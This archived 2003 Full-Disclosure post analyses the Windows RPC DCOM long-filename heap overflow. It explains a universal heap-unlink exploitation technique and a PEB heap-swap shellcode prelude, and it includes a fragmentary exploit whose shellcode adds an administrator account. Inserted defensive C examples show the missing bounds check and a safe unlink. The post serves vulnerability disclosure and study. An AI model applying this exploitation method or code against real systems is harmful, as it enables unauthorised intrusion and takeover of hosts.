[Full-Disclosure] [xfocus]The Analysis of RPC Long Filename Heap Overflow AND a Way to Write Universal Heap Overflow of Windows
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] [xfocus]The Analysis of RPC Long Filename Heap Overflow AND a Way to Write Universal Heap Overflow of Windows
- From: "quack@xxxxxxxxxx" <quack@xxxxxxxxxx>
- Date: Sun, 21 Sep 2003 01:28:56 +0800
The Analysis of RPC Long Filename Heap Overflow AND a Way to Write
Universal Heap Overflow of Windows
Create: 2003-09-21
Author: flashsky (flashsky1_at_xfocus.org)
Venus Active Defence Research Center
Thanks: colleagues of Venus, eyas (eyas@xxxxxxxxxx), benjurry (benjurry@xxxxxxxxxx)
and all members of xfocus
The RPC DCOM long filename heap overflow is similar to LSD's stack overflow:
both exist in the CoGetInstanceFromFile API, which was discovered by
Yuange@NSfocus, and MS fixed the vulnerability on the 10th of September. Now
let's discuss the details.
In the article "The Analysis of LSD's Buffer Overrun in Windows RPC
Interface", we discussed the CoGetInstanceFromFile API, which accepts a path in
UNC format. The RPC DCOM code checks the server name of the UNC path; if the
server name is the NetBIOS name or IP of localhost (including "localhost" and
""), then RPC DCOM goes on to process the filename part of the UNC path.
Here is the code:
.text:76151469 push 20Ah
.text:7615146E push edi
.text:7615146F push hHeap
.text:76151475 call AllocHeap <------------------ only allocates a heap block of 0x20A bytes
.text:7615147B mov edi, eax
.text:7615147D test edi, edi
.text:7615147F jnz short loc_76151491
.text:76151481 push [ebp+hMem] ; hMem
.text:76151484 call ds:LocalFree
.text:7615148A loc_7615148A: ; CODE XREF:
.text:7615148A mov eax, 8007000Eh
.text:7615148F jmp short loc_761514B9
.text:76151491 ;
.text:76151491 loc_76151491: ; CODE XREF:
.text:76151491 mov eax, [ebp+hMem]
.text:76151494 push dword ptr [eax+18h] ; lpString2
.text:76151497 push edi ; lpString1
.text:76151498 call ds:lstrcpyW
.text:7615149E push esi ; lpString2
.text:7615149F push edi ; lpString1
.text:761514A0 mov [esi], bx
.text:761514A3 call ds:lstrcatW <------------------ here is the heap overflow: MS never checked the length of the filename before concatenating it into the 0x20A-byte block
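To make the defect in the listing concrete, here is an added C example (not code from the original post or from Microsoft) that models the same sequence: a fixed 0x20A-byte allocation, a copy, then an unchecked concatenation. Beside it is the checked form that measures both inputs before writing anything. The `wchar16` type, the helper names and the sample strings are assumptions chosen for this example; `wchar16` stands in for the 16-bit WCHAR so the byte arithmetic matches the listing on any host.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Models the 16-bit WCHAR used by lstrcpyW/lstrcatW so the byte arithmetic
   matches the 0x20A-byte allocation in the listing on any host. */
typedef uint16_t wchar16;

#define UNC_BUF_BYTES 0x20A                             /* value pushed to AllocHeap */
#define UNC_BUF_UNITS (UNC_BUF_BYTES / sizeof(wchar16)) /* 261 code units */

size_t w16len(const wchar16 *s) {
    size_t n = 0;
    while (s[n] != 0) n++;
    return n;
}

/* Constructed test input: ASCII widened to 16-bit code units. Caller frees. */
wchar16 *w16_from_ascii(const char *s) {
    size_t n = strlen(s);
    wchar16 *out = malloc((n + 1) * sizeof(wchar16));
    if (out == NULL) return NULL;
    for (size_t i = 0; i < n; i++) out[i] = (unsigned char)s[i];
    out[n] = 0;
    return out;
}

/* Constructed test input: n copies of one code unit. Caller frees. */
wchar16 *w16_repeat(wchar16 c, size_t n) {
    wchar16 *out = malloc((n + 1) * sizeof(wchar16));
    if (out == NULL) return NULL;
    for (size_t i = 0; i < n; i++) out[i] = c;
    out[n] = 0;
    return out;
}

/* The pattern in the listing: fixed 0x20A-byte block, copy, then concatenate
   with no length test. Kept only for comparison with the checked version:
   the second loop writes past the block whenever the inputs exceed 260 units. */
wchar16 *build_path_unchecked(const wchar16 *prefix, const wchar16 *filename) {
    wchar16 *buf = malloc(UNC_BUF_BYTES);
    if (buf == NULL) return NULL;
    size_t i = 0;
    for (size_t j = 0; prefix[j] != 0; j++) buf[i++] = prefix[j];     /* lstrcpyW */
    for (size_t j = 0; filename[j] != 0; j++) buf[i++] = filename[j]; /* lstrcatW */
    buf[i] = 0;
    return buf;
}

/* Hardened form: measure both inputs first and reject anything that does not
   fit, terminator included, before a single byte is written. NULL = rejected. */
wchar16 *build_path_checked(const wchar16 *prefix, const wchar16 *filename) {
    size_t plen = w16len(prefix);
    size_t flen = w16len(filename);
    if (plen + flen + 1 > UNC_BUF_UNITS) return NULL;
    wchar16 *buf = malloc(UNC_BUF_BYTES);
    if (buf == NULL) return NULL;
    memcpy(buf, prefix, plen * sizeof(wchar16));
    memcpy(buf + plen, filename, (flen + 1) * sizeof(wchar16));
    return buf;
}

/* Reports whether a prefix/filename length pair would overrun the fixed
   block: exactly the test the vulnerable code was missing. */
int would_overflow(size_t prefix_units, size_t filename_units) {
    return prefix_units + filename_units + 1 > UNC_BUF_UNITS;
}
```

The boundary is 260 content units plus the terminator: `would_overflow(2, 258)` fits, `would_overflow(2, 259)` does not. A patch that adds the length test before the copy, as `build_path_checked` does, is the whole fix; the allocation size itself was never the problem.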
2. A Way to Write a Universal Heap Overflow of Windows
By overwriting the heap manager structure, we can modify the SEH or the return
address of a function when the heap block is released. But heap overflows were
regarded as difficult to exploit because of the problem of locating the
shellcode: the address of the heap is not fixed, no register or known address
points to the shellcode, and we cannot reach the shellcode through an opcode
such as JMP ESP.
Is there no way to exploit it? No!
As we know, with a normal heap manager structure, the heap operation is as
follows:
Content: ADDR1 ADDR2
Operation: MOV [ADDR2],ADDR1
After the operation, ADDR2 has been set to the address of the SEH and ADDR1 to
the address of the shellcode, and we gain control when the SEH is handled. But
how do we locate the shellcode?
Through research, we found that if we construct a particular heap manager
structure, it behaves as follows:
Assume ADDR3 is the upward heap link of ADDR1.
Content: ADDR1 ADDR2
Operation: MOV [ADDR2],ADDR3
Because ADDR3 is chosen by the system, the content of ADDR3 is executed when
the SEH is handled. Although we cannot control the content of ADDR3 in general,
we can control the first 8 bytes of ADDR3 through MOV [ADDR3],ADDR1. That is
enough: we can place a JMP there and jump to our shellcode. In general, the
distance between ADDR3 and ADDR1 is fixed for a given heap overflow, and we can
widen this area with lots of NOPs. If we can construct a heap manager structure
like this, then we can exploit the heap overflow. At the very least, we can
exploit the RPC long filename heap overflow this way.
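The two writes described above (MOV [ADDR2],ADDR1 and its mirror) are the ordinary unlink of a doubly linked free-list entry; they become an arbitrary write only because both destinations are read from the entry that the overflow just overwrote. The following added C example (constructed for this post, not NTDLL's code and not the author's) models such a list, shows the unchecked unlink, and beside it a checked unlink modelled on the safe-unlink test later added to the Windows heap: the neighbours must still point back at the entry, otherwise nothing is written. The struct and function names and the constructed corruption in `demo_detects_corruption` are assumptions of this example.

```c
#include <stddef.h>

/* Toy doubly linked free list with Flink/Blink fields, constructed here to
   illustrate the unlink writes; it is not NTDLL's heap code. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

void list_init(list_entry *head) {
    head->flink = head;
    head->blink = head;
}

void list_insert_tail(list_entry *head, list_entry *e) {
    e->flink = head;
    e->blink = head->blink;
    head->blink->flink = e;
    head->blink = e;
}

/* Walks forward from head; only meaningful on an intact list. */
size_t list_count(const list_entry *head) {
    size_t n = 0;
    for (const list_entry *p = head->flink; p != head; p = p->flink) n++;
    return n;
}

/* Unchecked unlink: the two pointer writes the post describes as
   MOV [ADDR2],ADDR1. Both destinations come from the entry itself, so once an
   overflow has overwritten Flink/Blink the writes land wherever those values say. */
void unlink_unchecked(list_entry *e) {
    e->flink->blink = e->blink;
    e->blink->flink = e->flink;
}

/* Checked unlink, modelled on the safe-unlink test later added to the Windows
   heap: both neighbours must still point back at this entry, otherwise nothing
   is written. Returns 1 on success, 0 when corruption is detected. */
int unlink_safe(list_entry *e) {
    if (e->flink->blink != e || e->blink->flink != e) return 0;
    e->flink->blink = e->blink;
    e->blink->flink = e->flink;
    return 1;
}

/* Intact list: unlinking the middle of three entries leaves two. */
size_t demo_unlink_intact(void) {
    list_entry head, a, b, c;
    list_init(&head);
    list_insert_tail(&head, &a);
    list_insert_tail(&head, &b);
    list_insert_tail(&head, &c);
    if (unlink_safe(&b) != 1) return 0;
    return list_count(&head);
}

/* Corrupted entry: simulate an overflow that replaced b's links with pointers
   to two unrelated objects (constructed corruption). Returns 1 when the safe
   unlink refuses and the decoys are untouched, which is what a hardened heap
   should do instead of performing the two writes. */
int demo_detects_corruption(void) {
    list_entry head, a, b, c, decoy1, decoy2;
    list_init(&head);
    list_insert_tail(&head, &a);
    list_insert_tail(&head, &b);
    list_insert_tail(&head, &c);
    list_init(&decoy1);
    list_init(&decoy2);
    b.flink = &decoy1;   /* constructed corruption */
    b.blink = &decoy2;
    int refused = (unlink_safe(&b) == 0);
    int untouched = (decoy1.blink == &decoy1 && decoy2.flink == &decoy2);
    return refused && untouched;
}
```

On an intact list both unlink routines behave identically, which is why the check costs nothing in the normal path; the difference only appears once an entry's links no longer agree with its neighbours, and detecting that before the write is what turns the write-anything primitive described above into a plain heap-corruption abort.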
The mechanism of the universal heap overflow exploit can be found in
"Utilization of released heap structure and exploit of universal Heap overflow
in windows".
Annotation: H D Moore uses this method in his exploit, but he did not handle
the problem of heap manager structure confusion, so it still does not work
100% of the time.
3. The exploit of the RPC long filename heap overflow
It took a long time after I had solved how to locate the shellcode, because
there was another problem: calling APIs from the shellcode behaves abnormally,
since the heap manager structure has been destroyed. At last I found that the
way is to replace the default heap of the PEB with another heap:
mov eax,fs:[0x00000018] <--------- the address of the TEB (its self pointer)
mov eax,[eax+0x30]      <--------- [TEB+0x30] is the address of the PEB
lea eax,[eax+0x18]      <--------- [PEB+0x18] holds the default process heap base
mov ebx,0x170000
mov [eax],ebx           <--------- replace it with 0x170000
Note that 0x170000 is only valid for Windows 2000 (Chinese version) + SP4 +
MS03-26. It is better to create a new heap with HeapCreate in the shellcode and
then replace the default heap of the PEB with that address.
This part comes from eyas's research (eyas@xxxxxxxxxx).
Because Winsock uses GHEAP, which is assigned the process default heap address
when the DLL is initialized, the heap becomes abnormal when a Winsock function
is called. Our advice is either that the shellcode does not use Winsock, or that
the shellcode searches for and modifies GHEAP and only then calls Winsock. (Since
the address of GHEAP may differ across versions, this loses compatibility.)
Another way to use APIs (including the Winsock API) is to recover the heap:
only the structure of the free-list chain is destroyed, not the other
structures, so we can analyse the chain, repair it, and then call APIs freely.
You can read more in my article "Utilization of released heap structure and
exploit of universal Heap overflow in windows".
Here we list the sample code to exploit the heap overflow:
To avoid direct use by script kiddies and worms, the code we list is not
we explain the technique in the code
Affected system :
It is the code of JMP 1E
ADDR3: here ADDR3 is the address of the UNC heap block.
This code can exploit W2K SERVER+SP3/SP4+MS03-26, but in the logged-in state
on SP3 it does not work well, because the next heap block after the previously
released block is not the structure we need to overwrite.
On SP4 it works very well. In the logged-out state on SP3, we need to run it
again and again.
We will give an example of how to send packets and control the heap state, so
that we can create a released heap block and exploit this hole universally.
We must modify the value of the SEH according to the target version.
The shellcode adds a user to the administrators group; the username is SST and
the password is 557.
RPCDCOM2.c ver1.1
copy by FLASHSKY <flashsky@xxxxxxxxxx> 2003.9.14
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>
unsigned char bindstr[]={
unsigned char request1[]={
unsigned char request2[]={
unsigned char request3[]={
unsigned char sccnsp3sp4[]=
//Add user SST,password is 557,
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" //
"\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26
"\x4C\x14\xec\x7C"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your
target's os
//FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic
"Utilization of released heap structure and exploit of universal Heap overflow
in windows ".
unsigned char request4[]={
void main(int argc,char ** argv)
SOCKET sock;
int len,len1;
SOCKADDR_IN addr_in;
short port=135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
printf("Code by FlashSky,Flashsky xfocus org\n");
printf("Welcome to our Site: http://www.xfocus.org\n");
printf("Welcome to our Site: http://www.venustech.com.cn\n");
printf("%s targetIP \n",argv[0]);
printf("for cn w2k server sp3/sp4+ms03-26\n");
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
printf("Socket failed.Error:%d\n",WSAGetLastError());
if(WSAConnect(sock,(struct sockaddr
printf("Connect failed.Error:%d",WSAGetLastError());
*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sccnsp3sp4)/2;
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sccnsp3sp4)/2;
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;
*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
printf("Send failed.Error:%d\n",WSAGetLastError());
if (send(sock,buf2,len1,0)==SOCKET_ERROR)
printf("Send failed.Error:%d\n",WSAGetLastError());
// len=recv(sock,buf1,1024,NULL);
wlj <wlj@xxxxxxxxxx>
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html